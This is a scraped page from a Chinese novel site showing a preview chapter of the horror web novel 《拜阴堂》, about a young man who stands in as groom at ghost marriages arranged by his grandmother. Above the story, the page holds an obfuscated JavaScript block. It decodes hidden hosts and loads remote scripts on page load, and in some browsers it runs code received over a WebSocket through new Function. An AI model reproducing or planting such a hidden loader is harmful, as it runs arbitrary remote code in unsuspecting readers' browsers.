笔趣阁

字:
关灯 护眼
笔趣阁 > 借我你的命 > 新书《拜阴堂》试读
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

新书《拜阴堂》试读

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
你们听说过冥婚吗?也就是给死人找配偶。
  
  以前的人订了婚,并不着急结婚,中途可能出现意外,有一方死了,古时候人们认为,要是不完成这个婚礼,那么死了的那个,一定不会安宁,便有了冥婚。
  
  还有第二种可能,没有婚约的情况下,年纪轻轻就死了,家里人为了慰祭亡灵,就会给他(她)找一个伴儿结婚,这种情况一般都找一个同样早死的异性,不会找活人。
  
  我叫陈平安,打小跟奶奶住,而我奶奶,是一个媒人,但她只给死人说媒。
  
  自我懂事以来就一直跟在奶奶身后,她每一次说好了一桩冥婚,我都会抱着新郎官的牌位,胸前带一朵大红花,然后跟死人拜堂,奶奶说,我这叫阴郎官,代替阴人做新郎,也算做善事,积阴德。
  
  什么积阴德,我觉得奶奶就是忽悠我的,这玩意儿,别提多渗人了,刚开始我不愿意,但一说这个奶奶就打我,说这是为了我好,被奶奶逼着几次,后来慢慢习惯了。
  
  甚至好几次,因为新娘是刚死的,就有两个人在我身边驾着新娘的尸体,我抱着牌位,和她拜堂,最后,竟然还有用木棍把新娘的尸体支着坐在凳子上,合照。
  
  那种感觉,没人说得出来,反正就算身边有人,照相的时候我的身体都在发抖,浑身凉飕飕的。
  
  好在的是,随着我长大,这种冥婚终于开始逐渐减少了,而我也心里踏实了很多,心想奶奶没了生意,那么我就不用做那渗人的事儿了。
  
  但是在我20岁那年,奶奶接了一单活儿,让我彻底认清了这个世界……
  
  王国栋是我们村子里面的名人,听说这家伙年轻时候没干过什么好事儿,在外头搞偷鸡摸狗那一套,问题他还挣了钱了,30岁不到就在外面领了个老婆回来,在家盖了一栋新房,镇子上开了个门脸。
  
  但是这家伙说来奇怪,他有钱,却不在镇子上住,就住在村子里。
  
  后来他老婆给他生了个儿子,但是17岁的时候夭折死了。
  
  有人说这家伙遭了报应,老天爷这是不想给他留后,但没过两年,这老家伙都快五十了,竟然又生了一个,不过奇怪的是平时挺高调的王国栋,这家伙竟然没摆满月酒。
  
  直到他抱着刚满月的儿子来找了奶奶,我才知道原因。
  
  这天一大早,王国栋急冲冲的进了我家门,直接找到了奶奶。
  
  “姑婆,这事儿只有您能帮我,我家守田说了,他要是没个媳妇儿,就不安生,你说这个狗日的畜生,走都走了,还不忘消停。”
  
  姑婆是我们村的人对奶奶的称呼,王国栋一进我们家的门,就对着奶奶哭诉。
  
  “你们家王守田都走了多少年了?怎么现在才想起来办这事儿?”奶奶坐在摇椅上给我缝衣裳,也不抬头看王国栋,毕竟奶奶对他的印象也不算好。
  
  “姑婆,这不最近那狗日的老给我托梦吗?还有,您看看这个。”
  
  王国栋苦着一张脸,我也不插话,而王国栋把他抱着小儿子的被褥打开,我看了一眼,眼皮子一跳,王国栋的儿子,大腿内侧有一块乌青的胎记,但是这胎记形状有点儿怪,有点儿像成年男人下面的那玩意儿,不,应该说很像。
  
  接着王国栋说这是王守田不甘心没碰过女人,给他弟弟生上去的。
  
  这会儿我看到奶奶把手里的针线活儿都放下了,抬头看向了王国栋。
  
  “十万。”
  
  听到奶奶的声音,我都给吓了一大跳,十万,这在农村绝对是一笔巨款,盖个小新房是没问题了,而且,这十万要是到手,我是不是该娶媳妇儿了?
  
  “姑婆,这也太高了点吧?”王国栋明显也因为奶奶的出价给吓了一跳,但奶奶面不改色,显然没打算松口的意思。
  
  “成,十万就十万了。”让我更没想到的是,王国栋竟然这么爽快就答应了,不过想想他儿子,这事儿也的确着急。
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师